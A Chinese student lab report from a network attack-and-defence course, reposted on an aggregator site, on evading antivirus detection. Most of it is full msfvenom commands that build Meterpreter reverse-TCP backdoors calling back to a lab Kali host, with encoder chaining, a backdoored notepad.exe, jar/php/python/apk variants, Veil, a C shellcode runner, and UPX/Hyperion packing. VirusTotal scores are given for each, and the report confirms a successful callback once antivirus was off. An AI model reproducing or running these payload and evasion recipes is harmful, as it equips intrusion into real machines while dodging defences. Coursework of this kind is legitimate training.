20232327 2025-2026-1 《网络与系统攻防技术》实验三实验报告

news/2025/10/26 20:40:59/文章来源:https://www.cnblogs.com/Amir3/p/19152941

1.实验内容

1.1 本周学习内容

  • 免杀:Virus AV,反杀毒技术,对恶意软件做处理,让它不被杀毒软件所检测;
  • 免杀技术:修改特征码、修改校验和、花指令免杀、加壳免杀(加密壳+压缩壳)、内存免杀

1.2 实践内容

  • 掌握免杀原理与技术
  • 使用Msfvenom、veil等工具生成后门代码,使用加壳工具、改变编码方式等操作实现免杀;通过virscan、virustotal等工具对生成的payload进行风险检测;

1.3 问题回答

(1)杀软是如何检测出恶意代码的?
通过“特征” 和 “行为”两个维度识别恶意代码,包括特征码检测(通过对比数据库中的恶意代码片段判定),行为分析(监控程序运行时的行为,判定是否符合恶意行为模型)和启发式检测(属于“预测型”检测,对未知文件分析其代码结构、逻辑流程判断是否属于恶意程序);
(2)免杀是做什么?
免杀是通过技术手段,修改或隐藏恶意代码的特征、行为,使其绕过杀软的检测机制,从而在目标设备上正常运行的技术;

(3)免杀的基本方法有哪些?
修改特征码、修改校验和、花指令免杀、加壳免杀(加密壳+压缩壳)、内存免杀;

2.实验过程

本次实验使用kali虚拟机和win10虚拟机完成,测试其相互能ping通;
本次使用的kali端ip:192.168.64.148
PixPin_2025-10-20_16-06-24
win10虚拟机ip:192.168.64.128
PixPin_2025-10-25_15-59-34

2.1 使用MSF编码器生成payload并进行检测

2.1.1生成基础载荷并进行检测

使用命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f exe -o 20232327.exe生成基础载荷;
命令格式:

msfvenom -p <payload参数> -f <输出格式> -o <输出文件名> [其他可选参数]

生成基础载荷
PixPin_2025-10-20_16-43-21

对生成的基础载荷进行检测,发现50/72的安全厂商将其标记为恶意文件,可以发现免杀效果不是很好;
基础载荷检测
PixPin_2025-10-20_16-47-49

2.1.2用不同编码器对基础载荷进行编码并检测

接下来对生成的基础载荷使用不同的编码器进行编码,测试不同编码后文件的免杀效果;

#指定编码器x86/shikata_ga_nai编码1次
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/shikata_ga_nai -i 1 -f exe -o shikata_ga_nai_1.exe
#指定编码器编码x86/shikata_ga_nai 8次
#迭代次数并非越多越好,5-10是较优区间。次数过少则变形不充分,次数过多会导致代码体积膨胀,反而可能触发“异常文件大小”的告警规则。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/shikata_ga_nai -i 8 -f exe -o shikata_ga_nai_8.exe
#指定编码器编码器 x86/alpha_mixed(纯字母数字编码)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/alpha_mixed -i 8 -f exe -o alpha_mixed_payload.exe
#指定编码器 x86/call4_dword_xor(异或 + 调用变形)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/call4_dword_xor -i 6 -f exe -o call4_xor_payload.exe
#指定编码器 x64/xor(64 位系统专用异或编码)
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x64/xor -i 7 -f exe -o x64_xor_payload.exe
#编码器 x86/fnstenv_mov(浮点指令变形)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/fnstenv_mov -i 5 -f exe -o fnstenv_payload.exe

PixPin_2025-10-20_17-19-41
PixPin_2025-10-20_17-19-51

指定编码器编码x86/shikata_ga_nai 编码1次
PixPin_2025-10-25_16-33-20

指定编码器编码x86/shikata_ga_nai 编码8次
PixPin_2025-10-25_16-10-13

指定编码器 x86/call4_dword_xor(异或 + 调用变形)
PixPin_2025-10-25_16-10-28

指定编码器编码器 x86/alpha_mixed(纯字母数字编码)
PixPin_2025-10-25_16-10-37

指定编码器 x64/xor(64 位系统专用异或编码)
PixPin_2025-10-25_16-10-45

编码器 x86/fnstenv_mov(浮点指令变形)
PixPin_2025-10-25_16-10-52

文件名 检测引擎命中数(/72)
20232327.exe 50
shikata_ga_nai_1.exe 44
shikata_ga_nai_8.exe 44
x64_xor_payload.exe 38
fnstenv_payload.exe 41
call4_xor_payload.exe 42
alpha_mixed_payload.exe 41

综合来看,使用编码器编码后的文件要比基础载荷的免杀效果稍好,x64_xor_payload编码的免杀效果相对较好,一次编码和多次编码对于免杀效果意义不大,单一编码手段免杀能力有限

2.1.3混合编码

尝试混合多种编码器,对生成的基础payload进行编码,发现使用多种编码器进行混合编码后的文件免杀效果会比较好;
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x86/alpha_mixed -i 3 -e x86/alpha_upper -i 2 -e x86/call4_dword_xor -i 2 -x ./notepad.exe -f exe -o 32bit_multi_encoded.exe
混合使用编码器进行编码后检测
PixPin_2025-10-25_16-32-17
使用windows Defender对生成的文件进行检测,发现没有检测到威胁,说明免杀效果比较好;
使用windows Defender对混合加密的文件进行检测
PixPin_2025-10-20_17-35-51

2.1.4将payload注入其他软件中

尝试调用系统软件,将payload代码注入到win系统自带的Notepad.exe文件中;
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x64/xor -i 6 -x ./notepad_x64.exe -f exe -o notepad_x64_backdoor.exe

命令格式
msfvenom -a <架构> --platform <目标平台> -p <payload参数> -e <编码器> -i <编码次数> -x <模板文件> -f <输出格式> -o <输出文件名>

找到系统中Notepad.exe文件并将其复制到kali中
PixPin_2025-10-20_17-23-28
将shellcode代码注入到记事本中,发现免杀效果会稍好一些;
将payload注入到Notepad.exe后检测
PixPin_2025-10-25_16-27-10

2.1.5生成其他格式的文件

命令格式同上
jarmsfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f jar -o 20232327.jarphpmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f raw -o 2023227.phppymsfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f raw -o 20232327.pymsfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f -o 20232327.pyapkmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -o 20232327.apk

PixPin_2025-10-25_16-45-07
PixPin_2025-10-25_16-45-17
PixPin_2025-10-25_16-45-30
PixPin_2025-10-25_16-44-21
PixPin_2025-10-25_16-56-07

文件名 检测引擎命中数(/ 总引擎数)
20232327.jar 34/64
2023227.php 9/62
20232327.apk 27/66
20232327.py 0/62
20232327.py(raw) 22/62

综合来看,python文件和php文件的免杀效果较好,jar文件和apk文件免杀能力一般;

2.2使用Veil-Evasion进行免杀处理

2.2.1安装veil

直接使用sudo apt -y install veil时,会因为网络原因下载速度很慢,这里使用从GitHub克隆Veil代码库的方法进行安装;
安装相关依赖
sudo apt install -y git curl wine python3 python3-pip mingw-w64
从GitHub克隆Veil代码库
git clone https://github.com/Veil-Framework/Veil.git
进入Veil目录并运行安装脚本
cd Veil/config
在这里使用vi setup.sh,将veil的源从github换成gitee可以大大缩短下载时间https://gitee.com/spears/VeilDependencies.git
veil换源
PixPin_2025-10-25_17-06-02
使用命令./config/setup.sh --force --silent安装

--force:强制安装,即使系统可能已有部分依赖项
--silent:在不提示确认的情况下自动安装所有依赖项

2.2.2使用veil生成免杀载荷

安装完成后,输入veil进入veil,依次选择use evasion使用免杀模块,use c/meterpreter/rev_tcp.py选择具体的payload生成脚本;set LHOST 192.168.64.148 set LPORT 2327,使用命令generate开始生成
使用veil生成免杀载荷
PixPin_2025-10-22_22-12-36
检验免杀效果
PixPin_2025-10-25_17-14-01
发现要比直接用MSF生成的载荷免杀效果要好;

2.3 C+shellcode实现免杀

通过使用msfvenom 生成C格式的Shellcode,并嵌入到C语言代码中;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -f c -o meterpreter_c.c

命令格式
msfvenom -p <payload参数> -f <输出格式> -o <输出文件名>

生成C格式的Shellcode
PixPin_2025-10-22_22-37-45

使用vim编辑生成的文件,在最后加上执行shellcode的主函数;

int main(){int(*func)()=(int(*)())buf; func();
}

主函数定义一个函数指针 func,将其指向 buf 数组(buf 中存储的是 Meterpreter 的 shellcode 二进制数据);
然后调用 func(),这一操作会让程序跳转到 buf 对应的内存地址,执行其中的 shellcode 指令,从而触发 Meterpreter 反向连接等恶意功能。
加上执行主函数
PixPin_2025-10-22_22-37-58
对生成的从+shellcode文件进行检测
PixPin_2025-10-25_17-22-38

2.4 加壳

2.4.1 加upx压缩壳

使用命令upx 2327_meterpreter_c_.exe -o 2327_meterpreter_c_upx.exe对上一项任务中生成的文件加upx压缩壳;
加upx壳
PixPin_2025-10-22_22-43-46

检测加了upx压缩壳后的效果
PixPin_2025-10-25_17-25-48
发现加壳后比不加壳时相比免杀效果变差了,可能是upx壳的效果太明显被广泛标注

2.4.2 加hyperion加密壳

将当前需要加壳的文件copy到hyperion文件夹下;
sudo cp 2327_meterpreter_c_.exe /usr/share/windows-resources/hyperion
进入hyperion文件夹加壳;
cd /usr/share/windows-resources/hyperion
这里的hyperion文件夹需要管理员权限才能改动;
sudo wine hyperion.exe -v 2327_meterpreter_c_.exe 2327_meterpreter_c_hypersion.exe
加hyperion壳
PixPin_2025-10-22_22-54-08

对加hyperion壳的文件进行检测
PixPin_2025-10-25_17-32-34
发现加了hyperion壳的文件免杀效果变差,说明壳的特征被识别

2.5 组合多种技术实现恶意代码免杀

1. 使用msf工具生成载荷+编码+加壳

使用msf工具生成一个工具载荷, 并使用x86/shikata_ga_nai编码器编码8次得到.c文件;
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b '\x00' LHOST=192.168.64.148 LPORT=2327 -f c > 20232327.c
msf生成载荷并编码
PixPin_2025-10-24_00-27-26
使用vim编辑生成的文件,在最后加上执行shellcode的主函数;

int main(){int(*func)()=(int(*)())buf; func();
}

在生成的载荷末尾加上执行主函数
PixPin_2025-10-24_00-28-45

主函数定义一个函数指针 func,将其指向 buf 数组(buf 中存储的是 Meterpreter 的 shellcode 二进制数据);
然后调用 func(),这一操作会让程序跳转到 buf 对应的内存地址,执行其中的 shellcode 指令,从而触发 Meterpreter 反向连接等恶意功能。
使用MinGW-w64编译该源文件
i686-w64-mingw32-g++ 20232327.c -o 20232327_.exe
命令格式
<交叉编译器路径/名称> <源代码文件> -o <输出可执行文件名>
接着给这个源文件加上upx壳和hyperion壳,并进行检测
upx 20232327_.exe -o 20232327__upx.exe
sudo wine hyperion.exe -v 20232327__upx.exe 20232327__upx_hyper.exe

检测最终生成的文件
PixPin_2025-10-26_11-59-42
此时发现免杀效果不是很好,上文中经过测试发现加壳后容易被识别,所以此时再尝试检测不加壳的文件;
不加壳的文件检测
PixPin_2025-10-26_12-01-52
因为这个壳的特征太过于明显,所以不加壳反而免杀效果会好一些;
用另一台电脑实测,在杀软(Lenovo Anti-Virus powered by Huorong Security)开启的情况下,无法运行软件;
PixPin_2025-10-26_12-07-36
在关闭杀软的情况下可以回连成功;
连接测试
PixPin_2025-10-23_23-35-54

2. 以win记事本为模板生成的载荷+加壳

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.148 LPORT=2327 -e x64/xor -i 6 -x ./notepad_x64.exe -f exe -o notepad_x64_backdoor.exe
以记事本为模板,生成的文件的基础上,再对其进行加壳,检测生成的文件;
对以Notepad.exe为模板生成的载荷加壳生成的文件检测
PixPin_2025-10-24_00-58-20
发现免杀效果还是比较好的,在电脑中使用杀软(Lenovo Anti-Virus powered by Huorong Security和Windows defender分别进行检测,发现都没有检测出风险;
使用Lenovo Anti-Virus powered by Huorong Security进行检测
PixPin_2025-10-26_12-16-05
使用 Windows defender进行检测
PixPin_2025-10-26_12-19-54

3.问题及解决方案

  • 问题1:使用命令sudo apt -y install veil下载veil时,因为网络问题下载速度很慢;
    PixPin_2025-10-20_22-07-16
  • 问题1解决方案:先使用命令sudo apt install -y git curl wine python3 python3-pip mingw-w64安装依赖项,然后从Github克隆代码库,更改安装脚本中的源为gitte的国内源后,顺利完成下载;
  • 问题2:在win虚拟机中运行生成的载荷时,出现找不到.dll库的问题;
    cec6309b3bbd61b3f009cf354440ce4a
    )
  • 问题2解决方案:在自己的主电脑中使用everything搜索这个库文件,找到这个文件后将其复制到载荷文件的路径下后,正常运行;

4.学习感悟、思考等

  • 在进行每一次的网络攻防实验之前,一定要保存虚拟机快照,可以避免在实验中对某些配置更改后无法还原的问题;
  • 不要轻易更新现在最新版的kali系统,已经是第二次犯这个错误了,更新系统后鼠标指针会丢失,能正常点击使用但是图片会丢失,查看鼠标图标的配置文件都是正常的,将鼠标大小调非常大后会正常显示,但是会变得卡顿,找了很多教程也没有解决这个问题;
  • 本次实验中,我尝试使用了多种免杀方法,但是因为一些免杀方法已经被安全观厂商广泛标注,所以反而不能起到很好的免杀效果,组合使用多种免杀方法可以很好的增强免杀效果,但是方法的使用是很重要的一部分;
  • 安全杀毒软件虽然强大,但是通过此次实验,发现还是有不少方法可以实现免杀效果,所以我们一定要有风险和安全意识,注意保护自己的设备环境安全,不要轻易下载来源不明的文件;

参考资料

  • 实验命令参考

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/947026.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2025年新风系统厂家权威推荐榜:电竞酒店/商场别墅/极寒地区全热交换新风系统专业解决方案

2025年新风系统厂家权威推荐榜:电竞酒店/商场别墅/极寒地区全热交换新风系统专业解决方案 随着室内空气质量日益受到重视,新风系统已成为各类商业与居住空间的标配设备。特别是在电竞酒店、大型商场、高端别墅以及极…

变盲从为探索:专注听课,深耕实操

在阅读《大学生为何必须重视课堂专注?》及后续两篇关于“学用结合”的分享后,我领悟到真正的成长,绝非被动地接受知识灌输,既需要高效的课堂输入,也需要扎实的实践与反思。对于我们大学生而言,学习不该是课上敷衍…

认真听讲,重新看见课堂价值

读完《大学生上课为什么一定要认真听讲?》这篇博客,我有所感触。这篇博客戳中了大多数大学生的“痛点”——认真听课,而这无非与态度有关,所以我决定重新审视自己对课堂的态度。 态度是心灵的面具。人的两只眼睛是…

VMware 25H2安装完Kubuntu 25.10后的设置

安装完Kubuntu 25.10输入用户名密码后无法显示桌面的问题Boot into the recovery mode terminal and run apt-get remove xserver-xorg-video-vmware 重新安装vmware-tools后,又不能显示桌面的解决方法: sudo apt ins…

Chapter-1 Memory Management (section 1.1-1.5)

简单介绍了页表及 Linux 建立完整的物理地址映射到虚拟地址的内存管理之前 memblock 的一些动作参考了 《打通 Linux 操作系统和芯片开发》 书籍的内容,实际也可以说是完全参照加上了个人的拙见或者是读书记录。 和我…

完整教程:在线教程丨百倍提速,中科院团队发布首个国产类脑脉冲大模型SpikingBrain-1.0,推理效率数量级提升

完整教程:在线教程丨百倍提速,中科院团队发布首个国产类脑脉冲大模型SpikingBrain-1.0,推理效率数量级提升pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; displ…

10/26/2025 一周总结

10/20/2025 杂题 对于一些多项式相关的问题(比如低次多项式的幂),可以考虑导数或者积分之后再求,可能会有一些比较好的效果。 10/21/2025 模拟赛 T1 有点抽象,做了两个半小时,也不是正解,但是感觉挺对的,最后过…

2025年饮料包装设备厂家权威推荐榜:缠膜机/吹瓶机/膜包机/杀菌机/水处理/套标机/贴标机/洗瓶机/卸垛机/旋盖机/液氮机/装箱机/灌装生产线专业解析

2025年饮料包装设备厂家权威推荐榜:缠膜机/吹瓶机/膜包机/杀菌机/水处理/套标机/贴标机/洗瓶机/卸垛机/旋盖机/液氮机/装箱机/灌装生产线专业解析 行业背景与发展趋势 随着全球饮料行业的持续增长,包装设备市场正迎来…

【API接口】最新可用抖音搜索接口

最新可用抖音搜索接口,实现抖音官方同款搜索功能,数据与官方同步,为开发者和内容创作者提供便捷的抖音短视频搜索功能 使用之前您需要先去注册下key 申请地址: https://www.52api.cn 接口地址:https://www.52api…

2025 年 10 月门窗十大品牌榜单揭晓,技术研发实力与市场口碑全景解析

2025 年 10 月门窗十大品牌榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合发布,本次评选突破传统单一指标局限,构建 “技术研发实力 + 市场口碑” 双维度全景评估体系。技术维度以《铝合金门窗》(GB/T …

2025年摩托车/机车厂家权威推荐榜:专业制造工艺与骑行性能深度解析,精选实力品牌及选购指南

2025年摩托车/机车厂家权威推荐榜:专业制造工艺与骑行性能深度解析,精选实力品牌及选购指南 行业背景与发展趋势 摩托车制造业正经历着深刻的技术变革与产业升级。随着新能源技术的普及和智能控制系统的广泛应用,现…

Valueof数据类型转换

int或其他数字类型转字符串就用String xxx = String.valueof(数字)

妙题合集

前言:本合集主要用于记录编者在学习过程中碰到的各种数学妙题。“妙”并没有什么具体的标准,主要就以思路新颖、有具体的极“妙”的某一步。 求证:$641 \mid 2{2k } +1 $

个人 Windows 电脑本地部署运行 DeepSeek 大模型

1、大模型管理器 1.1、下载ollama 官网下载地址:https://ollama.com/download如上图所示,下载 Windows 操作系统版本的 ollama 安装包。 1.2、安装ollama如上图所示,以“管理员身份运行”安装包。如上图所示,允许安…

2025年环保设备厂家权威推荐榜:废气处理、废水处理、噪音治理一站式解决方案,专业实力与高效服务深度解析

2025年环保设备厂家权威推荐榜:废气处理、废水处理、噪音治理一站式解决方案,专业实力与高效服务深度解析 行业背景与发展趋势 随着我国生态文明建设的深入推进,环保产业正迎来前所未有的发展机遇。作为环保产业的重…

生物信息与育种-全基因组选择/预测(GS/GP)合集【持续更新~】

系列报告 基因组选择(GS)让育种进入预测时代 全基因组选择:理论探讨 基因组选择(GS)如何加速作物遗传增益? Computomics:利用先进的机器学习实现预测性植物育种 基因组选择:加速遗传增益,缩短育种周期 基因组…

2025年锡膏厂家推荐排行榜,激光焊接锡膏,金锡Au-Sn锡膏,铟银锡合金高导热锡膏,水洗型锡膏,高温高铅锡膏,硅麦锡锑划线喷涂锡膏,Mini LED固晶锡膏,6号7号8号超细粉锡膏

2025年锡膏厂家推荐排行榜:激光焊接锡膏、金锡Au-Sn锡膏等特种焊接材料深度解析 行业背景与市场格局 电子焊接材料行业作为电子信息产业链的关键环节,正经历着深刻的技术变革与市场重构。随着5G通信、人工智能、物联…

2025 年 10 月门窗十大品牌榜单揭晓,技术创新实力与市场口碑双重透视

2025 年 10 月门窗十大品牌榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合重磅发布。本次榜单突破传统评选局限,以《铝合金门窗》(GB/T 8478-2008)为基础技术标准,创新性构建 “技术硬实力 + 市场口碑…

一个用于从头发现植物转录因子结合位点的可解释生成式深度学习系统

分享一篇由阿三团队近期发表在Plant Commun上的文章:PTF-Vāc: An explainable and generative deep co-learning encoders-decoders system) for ab-initio discovery of plant transcription factor binding sites。…

拜耳作物科学提出一种生物学引导的神经网络框架用于基因组选择(GS)

分享一篇2025年10月16日由拜耳旗下的拜耳作物科学公司在arxiv预印本上发表的文章:Biology-informed neural networks learn nonlinear representations from omics data to improve genomic prediction and interpret…